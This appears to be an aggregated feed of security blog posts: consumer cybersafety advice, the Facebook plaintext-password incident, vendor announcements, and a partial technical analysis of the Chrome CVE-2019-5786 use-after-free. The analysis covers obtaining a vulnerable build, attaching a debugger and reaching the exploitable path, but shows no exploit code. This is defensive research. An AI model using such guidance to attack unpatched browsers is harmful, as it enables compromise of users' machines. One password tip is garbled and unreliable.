Managing your family’s cybersafety can often feel overwhelming. But one thing I have learnt in my 22 years of parenting is that there are no silver bullets for any parenting issues. Whether it’s toilet training or driver training, it takes time and often a combination of strategies. Teaching your kids about online safety is no different. Yes, you need to put in the hard work and continue to have the conversations. BUT if it was possible to supplement the talking with some strategic parental controls and an automatic layer of cybersecurity, then I would consider that to be a parenting no brainer!

Well, this parenting no-brainer exists. Let me introduce you D-Link’s latest D-Fend Router which not only includes McAfee’s Secure Home Platform which automatically protects all your Wi-Fi connected devices but some pretty impressive parental controls too. And all this happens while users are delivered fast wireless connectivity with increased range and reliability. Awesome!

Being a First-Generation Digital Parent Is A Tough Gig

As a generation of parents, I believe we are the busiest yet. Not only are we juggling our brood of kids and their lives but many of us are also managing ageing parents, plus our own careers, relationships and social lives. And just to complicate things a little further, we are also the first generation of digital parents. Managing our kids and their fleet of devices comes with no guidebook or tried and tested generational wisdom, which makes our job even more complex. How easy did my parents have it – all they had to do was buy the Atari console in the 80’s!

But the job of a digital parent is only set to become more complex with Gartner estimating that by 2020 there will be 20.4 billion IoT devices operating in our world.

Many Parents Don’t Know Where To Start With Cyber Safety At Home

When I speak with parents about how they manage their kids and devices, there is a recurring theme – many parents know they need to be doing something to protect their kids from online risks, but they often don’t know where to start. As a result, nothing often happens. Research from McAfee confirms this too with almost a third of Aussies taking no steps at all to install security protection on either their own or their kids’ internet connected devices.

But there is no doubt that many parents are concerned about the risks. Research by Life Education in partnership with Hyundai Help for Kids shows that an overwhelming 95% of Aussie parents rated online safety as a very important issue which is very encouraging.

What Online Risks Concern Aussie Parents the Most?

Aussie parents have many concerns about the risks posed by the online world. I believe however, the following are the ones that increase parents’ blood pressure the most!

Screen time – The time our kids spend glued to screens is a huge concern for many Aussie parents. Whether you are concerned about ‘tech neck’, the growing rates of childhood obesity or simply, the lack of conversation at home – you would not be alone! Research by The Australian Institute of Family Studies shows that 12-13 year old Aussie kids are spending a whopping 3 hours a day in front of screens during the week and then 4 hours on the weekends. No wonder many parents are concerned.

Gaming – Recent research conducted by McAfee shows that some Aussie teens are spending up to 4 hours a day gaming. And while parents naturally worry about the opportunity cost associated with the time, their greater concern is around the risk of online grooming and of exposure to inappropriate and violent material.

Cyberbullying – This is the big one for many parents and rightly so. Cyberbullying can be absolutely devastating for victims. A quick google provides just far too many examples of young adults who have suffered significant psychological trauma or even lost their lives as a result of unchecked cyberbullying. Last year, our e-Safety Commissioner reported a 35% increase in cases of reported cyberbullying as compared to the previous year.

But Why Aren’t Parents Taking Action?

As a group of parents, there is no doubt we are concerned about screen time, gaming addiction, online grooming, and cyberbullying but many of us aren’t taking the necessary action to intervene and protect our kids. So, McAfee probed a little deeper in recent research and discovered that almost half of Aussie parents believe that their children can manage their own cyber safety from the age of just 10. Now, when my boys when 10, they were barely able to manage their own lunchboxes! So, this belief truly stuns me.

So, we have some parents who just don’t know where to start and others who believe it isn’t their responsibility. Regardless, there is clearly a need to take some decisive action to protect our kids from both online risks and problematic anti-social behaviours.

What Steps Can Parents Take Now to Protect Their Kids Digital Lives?

The good news is there are a few simple things parents can do to protect their kids and their growing fleet of internet connected devices. Here are my top tips:

  • Check a Device’s Security Track Record

Before buying any connected device, always research the brand and read reviews on a product’s security (or lack of). A quick web search will give you some pretty fast insight into the potential device’s security standards. Going with a notable brand that has a proven security track record is often the best option.

  • Always Change Default Settings, Use Strong Passwords & Enable Two-Factor Authentication

Default and weak passwords are the biggest threat to the security of internet connected devices. Hackers are very familiar with both default and obvious passwords which makes it super easy to access the data on your devices. Know these passwords and use them to access the data on your devices. If the thought of remembering several passphrases daunts you, go for a password manager. While a strong and unique password is a great place to start, enabling two-factor authentication on your devices and accounts will mean you’ll need to verify your identity with something that you (and only you) have access to. This is most commonly a mobile device, which ensures a higher-level of security.

  • Keep Your Devices Up To Date

Device software updates are often always designed to protect your device from recently discovered security bugs, vulnerabilities and threats. If you’re in the common habit of ignoring update notifications, turning on auto-update will ensure you apply these patches in real time and have maximum protection.

  • Invest in a Router that Protects Your Devices & Offers Parental Controls!

Investing in a Wi-Fi router with built-in protection like McAfee’s Secure Home Platform is one of the easiest ways of both managing and protecting your family’s fleet of devices. Not only does it automatically protect any device that connects to the Wi-Fi but it comes with some very strategic parental controls. So not only can you take back control and proactively manage your kids’ screen time but you can set up customised profiles to ensure they are visiting only suitable sites.

As a mum of 4, I believe that managing the risk in our kids’ cyber lives needs to be a genuine priority for us all. So, yes, let’s keep talking to our kids about online risks and the need to self-regulate our online behaviour. But, if we could also add in a later of automatic protection for our kids’ devices from McAfee’s Secure Home Platform and some savvy parental controls to ensure our kids are on track then I think that’s a pretty compelling parenting hack for us first generation digital parents!

Take Care

Alex xx

 

The post The Ultimate CyberParenting Hack – Managing Your Family’s Cybersafety with the help of your Wi-Fi Router! appeared first on McAfee Blogs.

Weekly Update 131

Weekly Update 131

So firstly, sorry for the audio quality. I'm pretty damn frustrated with those Instamics right now between the flakey firmware upgrade process and the unexpected loss of recording today. I'll make sure I get on top of it for next time.

I'm sitting at the gate in Seattle right now about to board so I'm going to cut this intro short and jump straight into the vid. Here's this week's which has a bunch of different things in it I found interesting including the usual raft of data breaches and other industry bits and pieces. Gotta fly, enjoy!

Weekly Update 131
Weekly Update 131
Weekly Update 131

References

  1. I'm doing a keynote for Akamai in Sydney on Thursday (hear more from me on data breaches and cyber-things)
  2. And another NDC meetup in Sydney that night (we packed these out in Brisbane and Sydney so register quickly for this one if you want to come along)
  3. The owner of Exactis wasn't real happy about the impact of their data breach on his business (yeah, the people whose data they sold weren't real happy either...)
  4. Elsevier looks like they logged a bunch of passwords in plain text (who would do that... oh, wait...)
  5. Facebook looks like they logged a bunch of passwords in plain text (they join Twitter and GitHub from last year in doing the same thing)
  6. Never ever, ever, ever install spyware on the devices of anyone you actually care about (seriously, how often are we going to go down this path?!)
  7. Twilio is sponsoring my blog again this week (they're talking 2FA with Authy, something you definitely want to look into if you're building any sort of auth system)

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace it with a bulletproof password to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone — a lock screen, secure passwords on accounts, and system updates — there are hacking tactics you likely know nothing about. According to McAfee’s recent  Mobile Threat Report, you don’t know because the scope and complexity of mobile hacks are increasing at alarming rates.

Hidden Apps

The latest statistics report that the average person has between 60-90 apps installed on their phones. Multiply that between all the users in your home, and you are looking at anywhere from 200-500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. Typically, hidden apps (such as TimpDoor) get to users via Google Play when they download games or customized tools. TimpDoor will then directly communicate with users via a text with a link to a voice message that gives detailed instructions to enable apps from unknown sources. That link downloads malware which will run in the background after the app closes. Users often forget they’ve downloaded this and go on with life while the malware runs in the background and can access other internal networks on the smartphone.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year it is the 60 million+ downloaded game Fortnite. The Fortnite craze has lead hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate. They offer enticing downloads and promise users a ton of free perks and add ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, crypto jack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

Facebook Users: Here are Proactive Tips to Keep Your Data Safe

Social media has become extremely popular over the years, providing users with an easy way to communicate with their friends and family. As social media users, we put a lot of faith and trust in these platforms to maintain the security of our private information. But what happens when our private information is mishandled? The reality is that these incidents happen and users need to be prepared. Yesterday, Facebook announced that it did not properly mask the passwords of hundreds of millions of its users, primarily those associated with Facebook Lite.

You might be wondering how exactly this happened. It appears that many user passwords for Facebook, Facebook Lite, and Instagram were stored in plaintext in an internal company database. This means that thousands of Facebook employees had access to the database and could have potentially searched through these user passwords. Thankfully, no cases of data misuse were reported in the investigation, and these passwords were never visible to anyone outside of the company. According to Facebook software engineer Scott Renfro, Facebook is in the process of investigating long-term infrastructure changes to prevent these security issues going forward.

According to Facebook’s vice president of engineering, security, and privacy, the company has corrected the password logging bug and plans to notify the users whose passwords may have been exposed. But what can users do to better protect their data when an incident like this occurs? Check out the following tips:

  • Change your password. As a precautionary step, update your Facebook and Instagram passwords by going into the platforms’ security and privacy settings. Make sure your passwords are unique and complex.
  • Use multi-factor authentication. While this shouldn’t be your be-all and end-all security solution, it can help protect your credentials in the case of data exposure.
  • Set up a password manager. Using a password manager is one of the easiest ways to keep track of and manage your passwords so you can easily change them after these types of incidents occur.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Users: Here are Proactive Tips to Keep Your Data Safe appeared first on McAfee Blogs.

McAfee Web Security offers a more flexible approach to Data Privacy

Post GDPR, there is still a lot of complexity in data privacy and data residency requirements. Depending on where they are located, what industry they are in, and how diverse their customer base is, companies are requiring a high degree of flexibility in the tools they use for web security. While most web security products in the market today simply document their data handling practices as a part of GDPR compliance, McAfee strives to give customers more flexibility to implement the level of data privacy appropriate for their business.  Most of our McAfee Web Protection customers use our technologies to manage employee web traffic, which requires careful handling when it comes to processing Personal Data.

Our latest update to the McAfee Web Gateway Cloud Service introduced two key features for customers to implement their data privacy policies:

  • Concealment of Personal Data in internal reporting: We enable you to conceal or pseudonymize certain fields in our access logs. You can still report on the data but Personal Data is obfuscated. As an example, you can report on how much your Top Web Users surfed the Internet, but administrators cannot identify who that top user is.

 

 

 

 

 

 

 

  • Full control of data residency: Especially in heavily regulated industries, many of our customers have asked for the ability to control where their log data goes so that they have control over data residency. We give you that control. For example, you can currently select between the EU and US as data storage points for users connecting in each geographical region. Additional finer control can be achieved by configuring client proxy settings, or through Hybrid policy. And, in conjunction with Content Security Reporter 2.6, customers can centrally report on all the data, while providing access control on the generated reports.

 

 

 

 

 

 

As a globally dispersed organization, there are of course still limits to what we can offer – our support and engineering teams, for instance, might need to access data for troubleshooting purposes from other geographies.  Telemetry and other data required to operate the service would still be global.  But to the extent that we can, with the access logs that contain PII, customers want more control.

McAfee Web Gateway Cloud Service is built for the enterprise, and many organizations will gain a higher level of performance than they currently experience on premises. As your security team continues to manage highly sophisticated malware and targeted attacks that evade traditional defences, McAfee Web Gateway Cloud Service allows you to go beyond basic protection, with behaviour emulation that prevents zero-day malware in milliseconds as traffic is processed.

The post McAfee Web Security offers a more flexible approach to Data Privacy appeared first on McAfee Blogs.

Give Hacking a Try…You Might Just Be Great!

One of the biggest challenges facing the AppSec industry today is the lack of skilled people. No matter how many firewalls are stood up, scans are run, or courses attended, almost all security efforts require highly trained practitioners. Whether it’s penetration testers, developers, hiring managers or release engineers, there are thousands of unfilled roles waiting for the right hires.

3059 android malware detected per day in 2018 – Are you still counting on free android antivirus for protection?

The incidents of cyber-attacks on smartphones, especially those working on the popular Android operating system, have been on a constant rise. However, a major reason people still continue to go in for android smartphones, is the fact that these are mostly cheap to buy. However, the year 2018 ended with…

Managed Google Play earns key certifications for security and privacy


Posted by Mike Burr, Android Enterprise Platform Specialist

[Cross-posted from the Android Enterprise Keyword Blog]



With managed Google Play, organizations can build a customized and secure mobile application storefront for their teams, featuring public and private applications. Organizations' employees can take advantage of the familiarity of a mobile app store to browse and download company-approved apps.
As with any enterprise-grade platform, it's critical that the managed Google Play Store operates with the highest standards of privacy and security. Managed Google Play has been awarded three important industry designations that are marks of meeting the strict requirements for information security management practices.
Granted by the International Organization for Standardization, achieving ISO 27001 certification demonstrates that a company meets stringent privacy and security standards when operating an Information Security Management System (ISMS). Additionally, managed Google Play received SOC 2 and 3 reports, which are benchmarks of strict data management and privacy controls. These designations and auditing procedures are developed by the American Institute of Certified Public Accountants (AICPA).
Meeting a high bar of security management standards
To earn the ISO 27001 certification, auditors from Ernst and Young performed a thorough audit of managed Google Play based on established privacy principles. The entire methodology of documentation and procedures for managing other companies' data are reviewed during an audit, and must be made available for regular compliance review. Companies that use managed Google Play are assured their data is managed in compliance with this industry standard. Additionally, ISO 27001 certification is in line with GDPR compliance.
Secure data management
With SOC 2 and SOC 3 reports, the focus is on controls relevant to data security, availability, processing integrity, confidentiality and privacy, which are verified through auditing reports. In managed Google Play, the data and private applications that enter Google's systems are administered according to strict protocols, including determinations for who can view them and under what conditions. Enterprises require and receive the assurance that their information is handled with the utmost confidentiality and that the integrity of their data is preserved. For many companies, the presence of an SOC 2 and 3 report is a requirement when selecting a specific service. These reports prove that a service company has met and is abiding by best practices set forth by AICPA to ensure data security.
Our ongoing commitment to enterprise security
With managed Google Play, companies' private apps for internal use are protected with a set of verified information security management processes and policies to ensure intellectual property is secure. This framework includes managed Google Play accounts that are used by enterprise mobility management (EMM) partners to manage devices.
Our commitment is that Android will continue to be a leader in enterprise security. As your team works across devices and shares mission-critical data through applications hosted in managed Google Play, you have the assurance of a commitment to providing your enterprise the highest standards of security and privacy.

Facebook stored hundreds of millions of passwords unprotected

Company admits to mistake and says it has no evidence of abuse – but the risk was huge

Facebook mistakenly stored “hundreds of millions” of passwords in plaintext, unprotected by any encryption, the company has admitted.

The mistake, which led to user passwords being kept in Facebook’s internal servers in an insecure way, affects “hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users”, according to the social networking site. Facebook Lite is a version of Facebook created for use in nations where mobile data is unaffordable or unavailable.

Related: Facebook's security is so bad it's surprising Zuckerberg hasn't deleted his account

Continue reading...

Why Take the Risk? Addressing Privacy Concerns with an MSSP

One concern that often arises when a company is considering hiring a Managed Security Service Provider (MSSP) and outsourcing their security functions is the risk of allowing a third party to monitor and take care of sensitive data.  For many companies, this can be a source of great anxiety.  Allowing a third party to access sensitive organization data and customer Personally Identifiable Information (PII) begs the question, what exactly is my MSSP monitoring?

While it is always a risk to give your data over to another entity, it is important to know that MSSPs will protect your privacy at all costs and are only interested in monitoring the security of your organization.

Let’s start to address the concerns by taking a look at what MSSPs are not monitoring:

What an MSSP is not monitoring:

A responsible MSSP places a high value on protecting client confidentiality and is primarily concerned with protecting the integrity of the client’s network infrastructure and data. As such, even if the ability is there, the MSSP staff does not review browsing activity or history, email content and recipients, or database information, ensuring full privacy for your executives.  MSSP personnel strictly adhere to confidentiality agreements and act professionally.  If sensitive information is seen, it is not discussed.

There are ways to ensure confidentiality is maintained, including detailed service level agreements (SLA) and statements of work (SOW). These are essential when transferring risk to an MSSP and can offer legal protections to a company in the event of a data breach.

What an MSSP is monitoring:

Typically, an MSSP will aggregate logs and events from multiple systems and sources within the client’s network infrastructure to a security information and event management (SIEM) system.  Those logs and events will come from infrastructure components like firewalls, endpoint security applications, and operating systems.  The SIEM will be configured with alarming rules that will generate alerts from incoming logs for the MSSP personnel to investigate and act upon.

Why partner with an MSSP?

Cost Advantage

Contracting with a third party to handle your organization’s network and information security has significant advantages, especially for small and medium-sized businesses that may not have the budget for a dedicated in-house information security team.  In fact, hiring an MSSP over an in-house staff is a way to make the most of your money by gaining access to 24/7 expertise without the burden of finding and retaining staff during the massive cybersecurity skills shortage.

Business Advantage

When you partner with an effective MSSP, they will provide monthly reports that not only improve visibility into your security posture, but also act as a tool to justify and build budget for future security needs.  This allows you to map your security objectives to the greater business objectives, which in turn helps get leadership on board with your efforts.

Technology Adaptability

A quality MSSP will be technology agnostic, with the ability to adapt to your current infrastructure, technology, and existing applications that you’ve already invested time and budget into.

Access to Expertise

Perhaps the largest benefit of contracting with an MSSP is the level of security expertise the MSSP can provide.  A quality MSSP will be staffed with security experts who are highly skilled in network and information security, organized to detect, analyze, respond to, report on, and prevent cybersecurity events.

Ultimately, when you engage the services of an MSSP, you receive peace of mind knowing that not only is your data protected around the clock, but your privacy is also prioritized and maintained.

Don’t settle for any MSSP; follow our Comprehensive Guide to find the right one for your needs.

The post Why Take the Risk? Addressing Privacy Concerns with an MSSP appeared first on GRA Quantum.

Return to Workplace: Ready to Relaunch Your Career

By: Sheetal, Application Developer & Majy, IT Support

McAfee offers a new program that offers professionals who dedicated extended time to their families the chance to reignite their passion for the technology industry and relaunch their careers.

Sometimes, it’s necessary to put your career on hold to raise kids, care for loved ones or serve your country. For many, it can be daunting to reenter the workplace after time away. That’s why McAfee designed its Return to Workplace program.

Launched in India in 2018, the 12-week Return to Work program offers training, support and resources for those who are looking to reenter the technology field and put their careers back on track.

Read Sheetal’s and Majy’s stories about how McAfee’s Return to Workplace program helped them build the skills they needed to reenter the workforce and come back strong.

Sheetal’s Return to Workplace Journey – Application Developer

To pursue my love for technology, I moved to Bangalore to complete my engineering degree in computer science, and I found rewarding work as a Quality Auditor. In 2015, I added another momentous title to my resume—mom. I gave birth to my first child and took my maternity leave; however, family circumstances extended my break.

Returning to Tech

Three years later, I was finally ready to get back to work, and I anxiously began my job hunt. It wasn’t as easy as I thought it would be, and I had a few concerns to say the least. Not only did I fear I’d be behind in the fast-paced technology industry, I also feared I wouldn’t find a supportive workplace as a single mom.

All Thanks to McAfee

As a single mother, McAfee allowed me to balance both my career and my family by giving me flexible work hours, technical mentoring, soft skills training, sessions with the HR team and several other resources to sharpen my professional skills. It helped me build my confidence over time, and today, I am working as a part of the application development team, assuring that the business works efficiently as possible.

McAfee has offered not only me, but a number of other wonderful women, a second chance to resume their careers at their own pace, without having to give up time with their families and children.

Majy’s Story – IT Support

Passionate about technology, I pursued my education in engineering at Calicut University and began my career soon after as a software engineer. I loved my career and the people I worked with—it’s what got me out of bed and excited about each day. Eventually, my reasons to start the day shifted when my husband and I were blessed with our first child. I decided it was time to put a hold on my career, to be there for my son and spend quality time at home during those early development years.

Facing Fears About Getting Back to Work

My son was growing up right before my eyes, and as he became more independent, I considered returning to my career. Even though I was eager to get back to work, I feared I wouldn’t find a company that allowed me to manage both a fulfilling career and raising a child at home—or if my skills would still be relevant.

 

Discovering McAfee Was the Best Thing Ever

McAfee’s Return to Workplace initiative completely blew me away. With the working environment that McAfee offered me, which was flexible and encouraging, I absolutely could not miss this opportunity. McAfee offered me several avenues to learn and brush up on my technical skills. They even provided me with a technical mentor! Having access to my mentor created a safe environment where I could ask my technical queries without feeling the pressure of asking the wrong question. In addition to this, the host of online courses I could leverage was an advantage for me. Ultimately, McAfee provided me with an environment where I could learn and grow without feeling intimidated. This was empowering and gave me the push I needed to successfully complete the program. McAfee was my natural first choice for returning to work and I couldn’t have been happier to accept a full-time position.

For more stories like this, follow @LifeAtMcAfee  on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

Ready to relaunch your career? Get the resources you need at McAfee. Apply here.

The post Return to Workplace: Ready to Relaunch Your Career appeared first on McAfee Blogs.

KNOW AND PICK YOUR ANDROID SECURITY APP WISELY



IN BRIEF: In recent year, we have seen a tremendous increase of mobile applications across many countries – It is like everyone want to come with a mobile application for many reasons. On the other hand, the rate of fake and malicious mobile applications is rapidly growing posing major security risk to mobile users.
-------------------------------------

 Mobile application developers are now facing threats to customers and application data as automated and sophisticated attacks increasingly target the owners, users and data of mobile applications.

Apart from jeopardizing our privacy from unprotected Application from various application developers, Criminals are also developing mobile applications with malicious intentions putting thousands of users who download them to fall victims of cybercrimes.





It is prudent to secure our mobile devices with security solutions – Sadly, A recent test of anti-malware apps available in Google Play showed that most are not, in fact, worthy of the name and, indeed, the space they take up on the Android device.


Independent testing outfit AV-Comparatives threw the 2,000 most common Android malware samples seen in the wild last year at 250 security (and, as it turns out, also “security”) apps that were available in the Android store in January of this year. Only 80 apps passed the organization’s most basic test – flagging at least 30 percent of the samples as malware while reporting no false positives for some of the most popular and clean apps in Google Play.

Crucially, only 23 apps passed the test with flying colors; that is, they had a 100-percent success rate at detecting the malicious code.

So, what are those purported anti-malware solutions that failed the test up to? You may have guessed it – for the most part, they’ll only foist ads on you. Put differently, instead of keeping you safe from pests that are banking Trojans, ransomware and other threats, many of the fake security apps will apparently only pester you with unwanted ads, all in the name of easy revenue for the developers.


Indeed, some of the products are already detected, at the very least, as “potentially unwanted applications” by at least some reputable mobile security solutions and are likely to be booted by Google from the Android store soon.

In many cases, the apps’ “malware-detecting functionality” resided in their comparing the name of a package for any given app against the AV apps’ respective whitelisted or blacklisted databases. This way of determining if a piece of software is safe or not, can, of course, be trivially easy to defeat by malware creators. Meanwhile for the user, it creates a false sense of security.


The fact that many ad-slinging apps are disguised as security solutions may not be a revelation for you. After all, ESET malware researcher Lukáš Štefanko warned early in 2018 about dozens of apps that professed to protect users from malicious code, but were instead only vehicles for displaying ads.

Meanwhile, a number of products that scored poorly in the test were deemed to be the work of what AV-Comparatives called “hobby developers”. Rather than focus on producing quality security software, these software makers apparently produce a variety of apps that are only designed to generate ad revenue for them. Still other developers “just want to have an Android protection app in their portfolio for publicity reasons”, wrote the AV testing outfit.

In addition, user ratings and/or download numbers are not necessarily something to go by. “Most of the 250 apps we looked at had a review score of 4 or higher on the Google Play Store. Similarly, the number of downloads can only be a very rough guide; a successful scam app may be downloaded many times before it is found to be a scam,” wrote AV-Comparatives, adding that the ‘last updated’ date isn’t a reliable indicator, either.


All told, the results can be understandably disheartening. On the other hand, they’re another reminder of the need to stick to reputable products with proven track records in mobile security.

Analysis of a Chrome Zero Day: CVE-2019-5786

1. Introduction

On March 1st, Google published an advisory [1] for a use-after-free in the Chrome implementation of the FileReader API (CVE 2019-5786). Clement Lecigne from Google Threat Analysis Group reported the bug as being exploited in the wild and targeting Windows 7, 32-bit platforms. The exploit leads to code execution in the Renderer process, and a second exploit was used to fully compromise the host system [2]. This blog is a technical write-up detailing the first bug and how to find more information about it. At the time of writing, the bug report [2b] is still sealed. Default installation of Chrome will install updates automatically, and users running the latest version of Chrome are already protected against that bug. To make sure you’re running the patched version, visit chrome://version, the version number displayed on the page should be 72.0.3626.121 or greater.

2. Information gathering

2.1 The bug fix

Most of the Chrome codebase is based on the Chromium open source project. The bug we are looking at is contained inside the open source code, so we can directly look at what was fixed in the new release pertaining to the FileReader API. Conveniently, Google shares the changelog for its new release [3].

We can see that there’s only one commit that modifies files related to the FileReader API, with the following message:

The message hints that having multiple references to the same underlying ArrayBuffer is a bad thing. It is not clear what it means right now, but the following paragraphs will work on figuring out what wisdom lies hidden in this message.

For starters, we can look at the commit diff [3b] and see what changed. For ease of reading, here is a comparison of the function before and after the patch.

The old one:

The new one:

The two versions can be found on GitHub at [4a] and [4b]. This change modifies the behavior of the ArrayBufferResult function that is responsible for returning data when a user wants to access the FileReader.result member.
The behavior of the function is as follows: if the result is already ‘cached,’ return that. If not, there are two cases; if the data has finished loading, create a DOMArrayBuffer, cache the result, and returns it. If not, it creates a temporary DOMArrayBuffer and returns that instead. The difference between the unpatched and patched version is how that temporary DOMArrayBuffer is handled, in case of a partial load. In one case, we can see a call to:

 

This prompted us to go down a few more rabbit holes. Let us compare what is going on in both the unpatched and patched situation.

We can start with the patched version, as it is the simplest to understand. We can see a call to ArrayBuffer::Create that takes two arguments, a pointer to the data and its length (the function is defined in the source tree at /third_party/blink/renderer/platform/wtf/typed_arrays/array_buffer.h)

 

This basically creates a new ArrayBuffer, wraps it into a scoped_refptr<ArrayBuffer> and then copies the data into it. The scoped_refptr is a way for Chromium to handle reference counting [5]. For readers unfamiliar with the notion, the idea is to keep track of how many times an object is being referenced. When creating a new instance of a scoped_refptr, the reference count for the underlying object is incremented; when the object exits its scope, the reference count is decremented. When that reference count reaches 0, the object is deleted (and for the curious, Chrome will kill a process if the reference count overflows….). As we’re looking for a potential use-after-free, knowing that the buffer is ref-counted closes some avenues of exploitation.

In the unpatched version, instead of calling ArrayBuffer::Create, the code uses the return value of ArrayBufferBuilder::ToArrayBuffer() (from third_party/blink/renderer/platform/wtf/typed_arrays/array_buffer_builder.cc):

 

Here is yet another rabbit hole to dive into (but we will keep it high level).  Depending on the value of bytes_used_), the function will either return its buffer, or a Sliced version of it (i.e. a new ArrayBuffer of a smaller size, that contains a copy of the data)

 

To sum up what we have so far, in all the code paths we have looked at, they all return a copy of the data instead of the actual buffer, unless we run the unpatched code, and the buffer we try to access is `fully used` (per the comment in ArrayBufferBuilder::ToArrayBuffer()).
Because of the implementation of the FileReaderLoader object, the buffer_->ByteLength() is the pre-allocated size of the buffer, which correspond to the size of the data we want to load (this will be relevant later on).
If we now remember the commit message and what the bad scenario was, it looks like the only situation to exploit the bug is to access multiple times the ArrayBufferBuilder::ToArrayBuffer(), before the finished_loading is set to true, but after the data is fully loaded.

To wrap up this part of the code review, let us look at the behavior of the DOMArrayBuffer::Create function that is being called in both patched/unpatched cases, the case interesting to us is when we have the following call DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());

From third_party/blink/renderer/core/typed_arrays/dom_array_buffer.h:

 

Something interesting to look at is the use of std::move, which has the semantic of transferring ownership.
For instance, in the following snippet:

then `b` takes ownership of what belonged to `a` (`b` now contains “hello”) and `a` is now in a somewhat undefined state (C++11 specs explain that in more precise terms)).

In our current situation, what is going on here is somewhat confusing [6a] [6b]. The object returned by ArrayBufferBuilder::ToArrayBuffer() is already a scoped_refptr<ArrayBuffer>. I believe the meaning of all this, is that when calling ToArrayBuffer(), the refcount on the ArrayBuffer is increased by one, and the std::move takes ownership of that instance of the refcounted object (as opposed to the one owned by the ArrayBufferBuilder). Calling ToArrayBuffer() 10 times will increase the refcount by 10, but all the return values will be valid (as opposed to the toy example with the strings `a` and `b` mentioned above where operating on `a` would result in unexpected behavior).
This closes an obvious case of use-after-free where the buffer_ object from the ArrayBufferBuilder would get corrupted if we would call ToArrayBuffer() multiple times during the sweet spot described above.

2.2 FileReader API

Another angle of approach for figuring out how to exploit this bug is to look at the API that is available to us from JavaScript and see if we can come up with a way to reach the sweet spot we were looking at.

We can get all the information we want from Mozilla web docs [7]. Our options are fairly terse; we can call readAsXXX functions on either Blob or File, we can abort the read, and finally there are a couple of events to which we can register callbacks (onloadstart, onprogress, onloadend, …).

The onprogress events sounds like the most interesting one, as it is being called while data is loading, but before the loading is finished. If we look at the FileReader.cc source file, we can see that the logic behind the invocation of this event is to fire every 50ms (or so) when data is received. Let us have a look at how this behaves in a real system…

3. Testing in a web-browser

3.1 Getting started

The first thing we want to do is download a vulnerable version of the code. There are some pretty useful resources out there [8] where one can download older builds rather than having to build them yourself.

Something interesting to note is that there is also a separate zip file that has `syms` in its name. You can also download to get debug symbols for the build (in the form of .pdb files). Debuggers and disassemblers can import those symbols which will make your life way easier as every function will be renamed by its actual name in the source code.

3.2 Attaching a debugger

Chromium is a complex software and multiple processes communicate together which makes debugging harder. The most efficient way to debug it is to start Chromium normally and then attach the debugger to the process you want to exploit. The code we are debugging is running in the renderer process, and the functions we were looking at are exposed by chrome_child.dll (those details were found by trial and error, attaching to any Chrome process, and looking for function names of interest).

 

If you want to import symbols in x64dbg, a possible solution is to go in the Symbol pane, right click on the .dll/.exe you want to import the symbols for and select Download symbols. It may fail if the symbol server setting is not configured properly, but it will still create the directory structure in x64dbg’s `symbols` directory, where you can put the .pdb files you’ve previously downloaded.

3.3 Looking for the exploitable code path

Not that we have downloaded an unpatched version of Chromium, and we know how to attach a debugger, let us write some JavaScript to see if we can hit the code path we care about.

 

